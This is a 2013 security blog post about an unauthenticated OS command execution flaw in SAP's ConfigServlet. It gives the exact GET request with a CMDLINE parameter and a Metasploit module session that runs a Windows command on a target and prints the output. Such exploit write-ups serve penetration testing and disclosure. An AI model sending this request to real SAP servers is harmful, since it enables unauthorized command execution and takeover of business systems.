Sunday, April 21, 2013

SAP ConfigServlet OS command execution metasploit module

If you ever tried to search for SAP vulnerabilities then I am sure you met some form of ERPScan's team awesome researches. This happened in our current pentest project as well. A colleague of mine identified several SAP systems in the target network range and we tried to find well known vulnerabilities for them.

We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin from ERPScan. One of the slides contains a very interesting screenshot about an exploitation of a simple, remote, authentication less OS command execution vulnerability. Yes, with a simple GET request it is possible to execute OS commands on the remote system. I tried to search for existing exploit implementations for this vulnerability but there were no public metasploit or other exploits available. Surprisingly not just exploits were not available but there were no relevant search results to this vulnerability so I decided to create a metasploit module for that.

The vulnerability exists in the /ctc/servlet/ConfigServlet servlet, where with the proper parameters you can achieve OS command execution.

To trigger the vulnerability you only have to request something like this:
GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=whoami
And the servlet will happily execute your commands from CMDLINE parameter and pass its output to the generated HTTP response. However, there are vendor patches for this vulnerability, you know how frequently companies apply them, so you have good chance to find a vulnerable version and exploit this vulnerability successfully.

It was easy to implement this exploit in metasploit. You can see my module in action:
msf auxiliary(sap_configservlet_exec_noauth) > show options 

Module options (auxiliary/admin/sap/sap_configservlet_exec_noauth):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   CMD        cmd /c type c:\windows\win.ini  yes       The command to execute
   Proxies                                    no        Use a proxy chain
   RHOST      10.1.10.100                     yes       The target address
   RPORT      50000                           yes       The target port
   TARGETURI  /ctc/servlet                    yes       Path to ConfigServlet
   VHOST                                      no        HTTP server virtual host

msf auxiliary(sap_configservlet_exec_noauth) > run

[*] 10.1.10.100:50000 - Sending remote command: cmd /c type c:\windows\win.ini
[+] 10.1.10.100:50000 - Exploited successfully

10.1.10.100:50000 - Command: cmd /c type c:\windows\win.ini

10.1.10.100:50000 - Output: TYPE=S
STATE=
INFO_SHORT=     + Process created!
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
<BR>CONFIGURATION=

[*] Auxiliary module execution completed
msf auxiliary(sap_configservlet_exec_noauth) >
As you can see the received output after the "Process created!" contains the output of the executed command.

Check the updates section in this post to access the code and to follow the life of my module.

[Updates]

No comments:

Post a Comment